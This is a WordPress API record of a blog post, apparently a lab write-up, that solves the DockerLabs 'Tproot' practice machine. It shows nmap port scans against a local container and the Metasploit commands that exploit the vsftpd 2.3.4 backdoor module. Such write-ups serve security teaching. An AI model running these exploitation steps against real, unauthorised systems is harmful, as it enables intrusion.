{"id":2965,"date":"2025-06-07T10:25:54","date_gmt":"2025-06-07T10:25:54","guid":{"rendered":"https:\/\/myvlcsys.com\/?p=2965"},"modified":"2025-06-26T09:10:40","modified_gmt":"2025-06-26T09:10:40","slug":"primera-maquina-ciber-dockerlabs","status":"publish","type":"post","link":"https:\/\/myvlcsys.com\/?p=2965","title":{"rendered":"Cyber: DockerLabs [Tproot-WriteUp]"},"content":{"rendered":"\n<p>In this write-up we solve the <strong>TPROOT<\/strong> machine from the DockerLabs platform, classified with a security level of \u201cVery Easy\u201d.<\/p>\n\n\n\n<p>Techniques used to solve the machine:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Port scanning<\/li><li>Searchsploit<\/li><li>Metasploit<\/li><\/ul>\n\n\n\n<p><strong>Download the Docker machine<\/strong><\/p>\n\n\n\n<p>megadl&nbsp; <a href=\"https:\/\/mega.nz\/file\/ORUEzLia#WQgvveTv3kAnXBs6UyRShd1JomGNg6Sk7DSa_fJwD7k\">https:\/\/mega.nz\/file\/ORUEzLia#WQgvveTv3kAnXBs6UyRShd1JomGNg6Sk7DSa_fJwD7k<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXf21_QddOr5MFk1OPXYuxjBLvYjcghBQHL_djOXfhcINM6UVq9mKFDlNPsWT4M8-Hro0ftafdjPbmrcKzTW5tEZ8jzeTX-puN0m9BuNvnKtWp0nAYZeuO18X3eQHIZbcf7k2tlMZg?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Unzip the machine:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>unzip tproot.zip&nbsp;<\/strong><\/li><\/ul>\n\n\n\n<p>\u250c\u2500\u2500(kali\u327fkali)-[~\/Documents\/maquinas\/tproot]<\/p>\n\n\n\n<p>\u2514\u2500$ unzip tproot.zip&nbsp;<\/p>\n\n\n\n<p>Archive:&nbsp; tproot.zip<\/p>\n\n\n\n<p>&nbsp;&nbsp;inflating: auto_deploy.sh&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;inflating: tproot.tar&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>&#8211;<\/p>\n\n\n\n<p><strong>Deploy the machine:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>bash 
auto_deploy.sh tproot.tar<\/strong><\/li><\/ul>\n\n\n\n<p>\u250c\u2500\u2500(kali\u327fkali)-[~\/Documents\/maquinas\/tproot]<\/p>\n\n\n\n<p>\u2514\u2500$ sudo bash auto_deploy.sh tproot.tar<\/p>\n\n\n\n<p>[sudo] password for kali:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXcUDXmgxc6fwZtN5oa1F0sjSgYUA0O1jWGoewfnDCXQkDOx4Coz-B7_qeMIDVCfDD4mneY9DiMfTATK9_vpN448QVgGc5kyjh_rhzoA2guwyv3Vf5OhD1yo54XXH40ukJQOKC0YgA?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>Once the machine is deployed, we have its IP address. From a new terminal we check that we can ping the VM and run a first port scan with nmap.<\/p>\n\n\n\n<p><strong>PORT SCAN:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXd6xtq_zBppy6aaJo-Dei8ZLHyF65bKEUDOsHwJivW8RUlRKy3NMa9LMWpCixq20B2evcmLy3wWr9hNcfE_vWRL1MD6fMlaedEJQeTclxP_KOW4QVXedWPcA8q3jArOtCmBkHm0_A?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXd70hgzDdIZzWK4vhhOZVbBMHNTf4MdhP9J4GqwD0R4BYaE7-kU71oV8smB6alGGbqHn9uaxayC5U2_YSPhzqSwPS06yCYuO9LZgPZ7j3NWiCJxyUH0mvtgsawI3-Q8nc_FMZU7LA?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>nmap -sCV -p 21,80 172.17.0.2<br><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXdMUNg-qEc6enZ_enVR6SLZ5btkBXGQTdoguyUaBEVUeL115japdSsfnIXDPHVHnuLLysydd6Kdkqw9AnQm0O_-GbzKMyRHfwSoZGHf1DJgOChxYNGpkbepUFhhxCvq3ZAKMtqhlw?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>PORT SCAN ANALYSIS:<\/strong><\/p>\n\n\n\n<p>After the 
analysis, we see that the target VM has the ftp and apache2 services running.<\/p>\n\n\n\n<p>Using the web browser, we check which website is hosted on the server.<\/p>\n\n\n\n<p>As for the vsftpd service, we see that it is version 2.3.4. This version may be vulnerable to a Metasploit exploit, so we will investigate whether the VM is vulnerable through this service.<\/p>\n\n\n\n<p><strong>PRIVILEGE ESCALATION.<\/strong><\/p>\n\n\n\n<p><strong>METASPLOIT:<\/strong><\/p>\n\n\n\n<p>msfconsole -q<\/p>\n\n\n\n<p>Now we need to search for the exploit for the target service, in our case vsftpd 2.3.4.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXe5PcTUMS-6louh6evn3Txwd5Lw7oYFPl7ZTv9caCiKYkv61L8OnIuS9QaUpdkz85QN6b9g8V1BlsZhOXLgbRre3PefTMB-BEEZBGM_ojZp7r8UA0n8rz5poFdmc-9hkxlP6bXlqw?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>We select the exploit with \u201cuse\u201d and configure the parameters it requires; in this case we set the IP of the victim VM with \u201cset RHOST IP\u201d:<\/p>\n\n\n\n<p><strong>use exploit\/unix\/ftp\/vsftpd_234_backdoor<\/strong><\/p>\n\n\n\n<p><strong>set RHOST 172.17.0.2<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXfvTAXRowWzOR98V5OFGhouHdwfZlm6u9QGvAZeQlFCn85xWd7Z_13Rak_JYph7kYONdIlY5MWHp8nGOyAHgagfl3LSQzYkUnb0UtlEcwxbvllbMEEj7T83_ENJ3-Jeph54dVbh-A?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXetQ9deKMYYSu7avY9E7nnmNxNn-QVp9BhpfZ5aaBNOfLsgN6omMgYwqVkyjkfzxDQ8OnQsCVodVfkxKB3sQ--0JrwUP88ubSIg6VoJFXQ80cqYwtUagEDA5oQXqTkwNHSx-sKFgw?key=_C9ahJIVd_zNhyGPQwocYQ\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>With that, 
we consider the intrusion into the machine complete.<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this write-up we solve the TPROOT machine from the DockerLabs platform, classified with a security level of \u201cVery Easy\u201d. Techniques used to solve the machine:&hellip; <\/p>\n","protected":false},"author":4,"featured_media":2974,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[60,74,10],"tags":[61,47],"class_list":["post-2965","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ciberseguridad","category-dockerlabs","category-linux","tag-ciberseguridad","tag-myvlcsys"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/posts\/2965","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2965"}],"version-history":[{"count":7,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/posts\/2965\/revisions"}],"predecessor-version":[{"id":3030,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/p
osts\/2965\/revisions\/3030"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=\/wp\/v2\/media\/2974"}],"wp:attachment":[{"href":"https:\/\/myvlcsys.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2965"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2965"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/myvlcsys.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2965"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}